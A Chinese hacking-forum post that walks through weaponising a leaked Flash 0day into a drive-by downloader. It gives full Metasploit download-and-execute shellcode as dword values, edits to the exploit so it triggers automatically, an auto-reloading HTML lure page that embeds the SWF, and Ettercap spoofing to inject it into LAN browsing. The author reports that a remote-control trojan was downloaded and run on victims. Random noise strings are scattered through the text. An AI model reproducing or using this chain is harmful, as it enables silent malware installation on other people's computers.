找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1560|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- K7 z2 N4 i% r 三、flash 0day之手工代码修改制作下载者实例入侵演示 : N& |( u& r; V Y5 J

1 \5 }3 Y6 {* I* j. n

8 J4 l y/ T2 S- ? z. e 利用到的工具: # u5 F! `' z) x

3 h, X2 |. U0 s# h) J, y

0 P( r7 G8 Z! m* q+ k: v( V( P4 A, w Msf v# [, Q, l+ `# r, ?+ m, y Q3 a

6 |, _! m0 I( e! R- R

# `& a" t* s: N# N+ {4 ] Ettercap % ]2 V: k) c5 X* \& f# ~

% G U# |$ I5 E

- g# g }$ O0 K" h: T Adobe Flash CS6 % e$ ~5 D5 t# v2 c* s' s% ?: V1 P: w

% w4 B" x9 Y$ u- a

1 u% \5 w2 d6 n/ e# s6 I Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 8 U* w: s. S7 j5 J5 e4 e

" M' X6 m. M% s7 v

$ I+ q6 D: j8 W+ Z+ i9 B% J8 t 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 4 u# a" r; `, ?4 X4 U

4 f/ Q' H) F$ J

8 o( J8 t9 [& W K: L- l, ?- ~ 如图: 9 B2 {5 R" {6 L+ l: U: ]; S

) E- s' ~: O. C

/ S$ D t; X0 c q   ) J( Q1 y" a2 M% I4 R

. C) H& f( j0 c- b: o- G

" Q' z/ i6 w! L   ( ?/ i# R1 S! z+ ^

/ v5 Y3 `" m2 Q& ]9 u8 \- R

+ A, F' v$ a r. l. q0 U, \, V& I 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 9 y( q5 s$ [$ T$ Z( n

$ s9 p3 s0 N5 d' t4 H% x

; Y/ s3 P( Z' q0 O1 C7 o   8 p# S2 y5 j% P: |

- X O1 }+ S% w1 U# V/ m

" P7 f; S d) S4 w7 \: n   * H% j7 B4 M3 P. ]

; t0 o+ d8 @) e) k Y0 V5 {3 @, l1 q

/ _ t+ a7 U1 I4 u. f9 |5 _/ R 然后执行generate -t dword生成shellcode,如下: * r& a4 f+ N2 e# B6 ]5 A

# ^4 D3 E! q+ g' r) ~% ~ h$ ^

8 k- q* [; u) x A; ~   $ P+ @2 m T2 l; l6 T+ E/ N3 Y

1 T6 W7 O& Y7 q$ Z5 Z

4 x, n9 n {, {! _. a. ? 复制代码到文本下便于我们一会编辑flash exp,如下: 3 ]( U8 e. p3 z1 ]' |7 T' f+ F

+ v8 ~9 Y) q3 S; I) ]; ~$ I

: X; o/ Z" P) z 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, . O" V% a/ F+ G d2 E; _( t$ P, e

6 u3 }! w1 l: X" H; C4 H8 P

6 u, Q8 g" d: W) Z% w1 V8 h8 r 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ) U+ q. O' V) _, f6 Z6 ]" h

* B- O' F) p. {' j* S

, h7 P* d7 F7 J8 N4 g 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 8 w. d5 { p& [' E+ l7 s" J2 h

0 l' n$ T' X/ i3 n4 ]2 i3 K

( |' t+ G$ \9 W) d; k! a 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 B, |* f" f( b+ V0 o7 k" U. q

5 Y8 E* V" d7 W7 B. T

' ~; o; N" r( V 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ( ^9 \7 K$ S; ]6 y

: c& h$ e( u# i7 ^' c, H+ M9 }3 c) B" O

, O% J6 N1 P) J8 `4 r 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ( b1 k. n& l- A7 m$ k

$ a8 l! n# b- g+ h- Q6 {3 ?; U

8 `, P$ Y7 \4 b' A" g! I' ` 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, : `. \" L6 g& [6 A0 \

# B2 D0 o9 x" H! A

& {" v3 j4 r! Z0 b 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, : z9 u* ?, P4 M( ~9 P

- Q. a6 j5 [6 J. c' S1 e

- M5 J8 h4 |. L; z3 H7 T# I 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, . H' O# _" O! s: W' f$ {+ w# I; t1 s2 }

1 `9 {) L! M* x% f- F

! n# k4 Q7 f$ ^, D- }1 M1 o" F 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ! d8 q9 v, H' v) X% l' m5 U! {

% s4 A6 x& z: _$ h6 m `

% @* F8 ~/ e' a9 ~( c 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ! Z" H9 L* R t1 M3 i

1 K4 L7 j, @, f0 k. K5 G5 M/ W0 Q

e- V8 P' S. Y) o 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " u2 u* A+ u* D9 n

$ Y% V/ S' ~5 Q j u

( r) v5 \: `6 t" e( W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, , L7 l1 Z2 H& q9 R( J8 @/ L! E

4 @' n/ W6 N' G4 G* t

( \. N( @7 |$ l! E8 |0 [ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 [2 f4 z% R) b' j7 _3 _

; B0 N2 R# ]8 y/ Y

- |% t' P- B( B/ R$ p8 l/ R/ z5 N0 O   . y7 Q2 \1 }# @

' R+ X1 H: x& o, c0 g- c

+ Q9 Z: ], ~5 T2 { B0 }5 C   + n* o2 R2 f% E! [6 _9 \

3 C% x9 W* z, R0 a+ o# ?& z

! u/ B& A; G2 M! M 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 7 z* \" C( u5 W# o& u6 e2 C4 T

+ V! p8 @$ I# H( {1 v0 X- |

: }+ r6 ?0 _+ ?% u2 `   " m, Z0 b: J. |3 c

6 T: Y! e) r1 r3 R3 w. Q

( f) g1 Y- x9 Y0 r% c [0 I 先修改ShellWin32.as,部分源代码如图: , @- O: }# t9 ]: `1 P- R

$ X: d' F# w5 S. A' A

) V! \. ]# @* L9 q4 L7 i   a6 F( W4 l% w1 [# r7 j" ` h( q' W

' O8 u* c+ p. I7 X& P; t4 G0 U

; e& V8 v& P& A$ G& e 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: - R! C. \0 s1 O3 _; b! E/ U3 t

8 Q1 U6 s9 r4 F u! a1 Q3 c

0 {$ m0 U: k, U( \   ) R' e3 e6 H% C. o, r

0 G1 A& Q$ j% _. @: ]4 Z( H/ j; k

* R# Q8 f+ y" ^* ] O 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 1 a- G& r/ n' l/ D) m

N4 h- ~, M l6 K

S {7 E8 U6 w   7 t6 k+ g$ N( F, b9 U

# M4 q, M1 Z3 x$ A$ k/ ]4 g

* P! o8 G# Z/ b3 F/ t R 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: # [. z% ]$ w/ `2 ~: D+ d4 X

, W& {, O& c. M3 Z4 T" ], c/ W

9 i$ x& T4 [9 H: L4 }3 i   ! E( H9 W2 ?2 @* r5 A" G3 C9 B3 R

$ n! F& c9 `1 H+ X

% ^" C( j" T# u$ [8 N   % ]( D" u% x1 b r! i; V! u

+ o* k: v& U2 h; h8 \4 r! F

1 q; V* c7 i- L* y k) S- T8 E   ( V7 f) ^; ?1 @ c) b* M

$ U4 r6 l2 X& d" W# n% C0 w& M

; W7 t: S) |2 |. a+ h 然后点保存,下面我们来编译一下,打开 3 b& `3 g4 w4 I# J5 u

/ j% C0 Q8 B7 H+ y# l: t

1 Q- o8 c1 k* p; Q) Y0 E& O, U exp1.fla然后点文件-发布,看看编译没错误 * e- x9 u$ G. D8 ~4 `. b# M

& Y' k3 h8 N! J% v

+ ~: f4 |, n U1 v! t) S   - P& `& C0 k. D# F5 j

% r6 T! m. u7 {# q3 U s

5 {+ V# T5 ~2 N3 A1 n5 w   3 i& N( P5 J/ O/ L% i+ ~! p

8 K) m; u7 ?9 a1 f5 k

( [+ u' D! @* C6 n# ^4 I' `   $ f, Z( C* H& e8 Z: W3 q F

8 w) @" Z2 E$ `7 l' R. e; [

8 q$ t- V% F# b3 M0 R3 c* F   j$ Z! a$ j. }1 [/ D

0 J$ U3 ^3 e1 Y9 Z; f

& y/ Y& b! D/ D0 ?7 i) x 然后我们把生成的 & E/ u7 {4 v' @' u" o

! |! P3 D1 f/ b) [

' U) [% L2 M7 ^- T; l exp1.swf丢到kailinux /var/www/html下: 1 Y7 o: f7 }) m! V# R1 W' o/ M

0 e2 u9 |6 d$ q% V y% u( o& A9 Q \

% u+ Y7 K" }9 |/ N 然后把这段代码好好编辑一下 ) X+ ~' H% C/ N6 M

/ `2 ?8 E) X! T7 M/ r

4 x8 s! g& v( D4 w   7 r( w0 [# K9 c, A" O* l, Y

( ` d& ]) y0 x- D# |

* v N; ^5 ~5 o8 Y: n S   1 \, @ T% E- v. j$ N4 V* y

6 s; }) S4 {2 d, J C

$ p7 Z# j# t7 A! \. K$ D+ Y   7 n7 h- r+ b* J

; T2 U/ V3 {; B1 H

# A& F' h2 `. S. q1 z8 l: ]6 U+ b' y   & E6 y/ y! m7 s

2 v/ ^6 ~9 V8 i$ Q3 f4 D0 w

9 ?* Q3 \3 K& l p   / O n3 l9 g6 F4 V N; } g Y

S( F7 K$ T% @; C7 Y# D- m0 g

/ e& T; D2 z! A/ N% Y. `   ; a$ x. U8 n2 q& u

/ U) a% |# H1 d5 P5 T6 l( K5 `0 b# r

7 v' R. ?0 [; l <!DOCTYPE html> 4 ?( J0 o9 U: u+ n3 {1 D

& d# E: y, S! ]6 i, @) J

/ ] {, G- G" S. u <html> - Z* i6 T+ g% d- s7 ?9 t

|+ C8 j4 T7 E

3 f# M" P- m; r2 g6 M% @* O& r <head> & x& W p p( N

7 s7 `% }: z8 W" k! T3 d

* \+ w( _, Y. C( C) J( K! e <meta http-equiv="Content-Type" content="text/html; " T5 x: Y2 ?; _

+ ~: J% j) _7 ? g" |0 K, y) g% f

5 M; L) U5 A0 S8 r: ?8 g charset=utf-8"/> ' w; K1 \% ]) ~% l& ~

! s+ |* D( G" G O! S$ d# d

: \( r* h( p d; p </head> 0 R% E0 W4 R6 s4 y9 M4 i- F0 f

) h2 @' ]! W: A+ ?8 K$ Q6 e

1 ^1 x: f- \( t% l <body> ( t8 k( o9 o* I2 i* e6 c, e( N

% I. ?) c* t" y3 B s. {" }6 g

2 o" S! k* T2 ~5 {; R <h2> Please wait, the requested page is loading...</h2> 3 r% O7 l9 U: B% `' G

( Y' _0 O; }1 Q2 G

, k- w7 d$ O8 q5 I: @0 V. d! M <br> 8 p- \+ c0 M0 q2 M1 q7 E

( W& r( A; k j9 \6 u p) a

4 [- {: y( \/ n' e/ t( ? <OBJECT ; n! P) A1 _# S

' q4 K2 h3 _( {" `

2 a8 A1 A+ k' p H- E' s classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . Q+ j0 G- i8 y) r; W3 G

6 o- {) u' V& S2 C, W- ~

( Q' T# u# L8 C& C VALUE="http://192.168.0.109/exp1.swf"></OBJECT> " G6 e6 s9 d9 }- |! F' I$ X

# s k1 q/ V6 D! c' K: M; Z" @3 H1 }

; h" V& r1 i ~% L </body> 2 ~5 [/ I( x0 I& u9 n1 J

; u+ j" y, o/ }8 e: _( C6 ]

& B8 T; {% Y% i <script> / ]# D. G( l" v! h9 ?, l

" S, H ]/ g2 D8 a) r

* `! f6 t( u1 |4 v     setTimeout(function () { " M' E6 a% S- _- l' Z

0 j) \3 V) ]: A$ y! c

. t& x/ Y1 ?; P          # z5 z0 E* D/ x# z; R. @& m6 l

3 G: N9 r3 K3 A2 ]2 {3 v! y

) d5 l0 u# u: m. D; c window.location.reload(); C& n6 F N3 h ?/ s0 a& }) V$ s

% B) l* e+ D/ B/ t: T3 n/ z

4 e3 v6 j+ r! Q$ S$ A     }, 10000); 3 o) i( h2 n8 h3 `: }

7 N7 c' H3 |( \- a$ f. S

' u1 w% P" X# k& l) t   6 M$ G! [ [' z: @; i

* P0 y8 i( S4 A3 t# T+ f

3 Z5 ~; O% m5 i8 x: ]6 R </script> 3 {. l3 F+ E' {. c! O/ J5 d+ |

4 F6 X; ?6 }( ]: C& L$ e

! I0 g# c; S& }: J </html> 1 D' V: U: j1 H5 a8 ~ O6 g& i3 f

1 u& z* Z4 I. j! f; r+ m6 S

! L" p( a4 F: b5 }. Z% Y   5 h. B9 L$ ]7 I- M

. M e+ H! ?: d/ z0 J. @5 k

9 B7 C% }8 e- |7 w' s- J 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: , t- W/ V& h" V7 z7 r

% M" h8 K; r, U

2 M7 d) @ i1 e+ ^6 V! q! r   ) @, d- w5 S4 @/ C% S

4 {' I, M9 N( `

7 m7 ?, z% S# X+ `! ?   9 q0 k0 ]7 E. I( P* I

( s7 |: Q) q# ~

" ]7 I$ {) y3 |: T1 p3 \   - {6 `- E! a$ m/ }" V

* B% [1 \+ H9 S3 [* g3 w/ F4 u

; T2 p1 K* z7 t1 w2 E) Q0 a   ) w9 a& O& h; k! \* i' D

- g' t9 x; _, D K& }

9 _% F" L+ D7 z" x) T+ |   : A/ x& q2 {$ i( |" G

6 X1 n e3 W) Z

" R6 g5 |, T% Y9 t! z1 p; D- e$ h 下面我们用ettercap欺骗如图: 9 }5 z+ V$ E% h- |; H/ d8 B

4 n% l, A( _+ E4 @2 C& G. S2 E# u

; v8 @ R. U) E; r3 ^7 U5 b# \   # U+ j1 \- b9 t# ]! J( J% M- T* d

& }% c$ N. p$ C$ ?

3 C; h& v. A: F' b1 u   % n3 ~( C: M9 H2 h& V

% d( p) ?# F3 v3 W" Z

$ x) q1 W% R" |% i0 n' j 下面我们随便访问个网站看看: 9 A8 O& m# S7 Y+ V% j6 r+ f6 I

5 ] |1 H/ _, c4 `+ T: p% M

0 |0 ^3 C# N& r$ s9 y% v9 ^7 a2 S 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # w4 P# _$ E2 I1 G6 V

- S9 z: e3 v7 ]* ^7 S H% n5 p q

" u! }0 h# G* A   4 Q. h& U# r2 Z: x: o

, A) N! Y& [4 m/ p

1 e- _6 d w8 b4 w 我们看另一台, 9 w2 C) p/ A6 ]5 s# @

; [, [- J' G' g% j! W1 l2 a

9 J9 i3 s. R; J9 C$ N 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 , L/ A" X( `% y0 |

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表